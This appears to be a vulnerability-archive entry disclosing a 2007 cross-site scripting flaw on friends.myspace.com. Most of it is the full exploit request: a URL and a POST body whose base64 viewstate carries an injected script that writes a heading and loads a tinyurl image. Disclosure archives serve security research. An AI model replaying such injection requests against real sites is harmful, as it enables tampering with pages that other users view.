Security researcher momby, has submitted on 21/04/2007 a cross-site-scripting (XSS) vulnerability affecting friends.myspace.com, which at the time of submission ranked 5 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/04/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/04/2007 |
Date published: 21/04/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: momby |
Domain: friends.myspace.com |
Category: XSS |
Pagerank: 5 |
URL: http://friends.myspace.com/Modules/ViewFriends/FriendsView.aspx?%3ffuseaction=user.viewfriends&frien dID=6221 |
POST: __EVENTTARGET=ctl00%24cpMain%24pagerTop&__EVENTARGUMENT=1&__VIEWSTATE=%2FwEPDwULLTE5MTQxOTkyMzIPZBYC Zg9kFgQCAw9kFgICBg9kFgJmDxYCHgNhbHQFEVBvd2VyZWQgYnkgR29vZ2xlZAIFD2QWAgIBD2QWBAICDxYCHgdWaXNpYmxlaBYC AgUPFgIeBXZhbHVlZGQCAw9kFgJmD2QWDAIBDw8WCh4LcmVjb3JkQ291bnQCzNf3UB4IcGFnZVNpemUCKB4GcGFnZU5vAgEeD2Zp cnN0SWRQcmV2UGFnZQIKHg5sYXN0SWRQcmV2UGFnZQLdHWRkAgMPFgIeBFRleHQFfTxzY3JpcHQ%2BZG9jdW1lbnQud3JpdGUoJz xoMSBhbGlnbj0iY2VudGVyIj5XaW4gQSBEYXRlIFdpdGggSGVtdSBOaWdhbSE8L2gxPjxpbWcgc3JjPWh0dHA6Ly90aW55dXJsLm NvbS8ydDc4ZGg%2BPC9hPicpPC9zY3JpcHQ%2BZAIFDxYCHwgFCzE2OSw3MzMsMDY4ZAIJDxYCHgtfIUl0ZW1Db3VudAInFkxmD2 QWBAIBDxYCHwFnZAIJDxYCHwFoZAIBD2QWAgIJDxYCHwFoZAICD2QWAgIJDxYCHwFoZAIDD2QWAgIJDxYCHwFoZAIED2QWAgIJDx YCHwFoZAIFD2QWAgIJDxYCHwFoZAIGD2QWAgIJDxYCHwFoZAIHD2QWBAIJDxYCHwFoZAILDxYCHwFnZAIID2QWBAIBDxYCHwFnZA IJDxYCHwFoZAIJD2QWAgIJDxYCHwFoZAIKD2QWAgIJDxYCHwFoZAIMD2QWAgIJDxYCHwFoZAIND2QWAgIJDxYCHwFoZAIOD2QWAg IJDxYCHwFoZAIPD2QWBAIJDxYCHwFoZAILDxYCHwFnZAIQD2QWBAIBDxYCHwFnZAIJDxYCHwFoZAIRD2QWAgIJDxYCHwFoZAISD2 |
Click here to view the mirror
|
|
|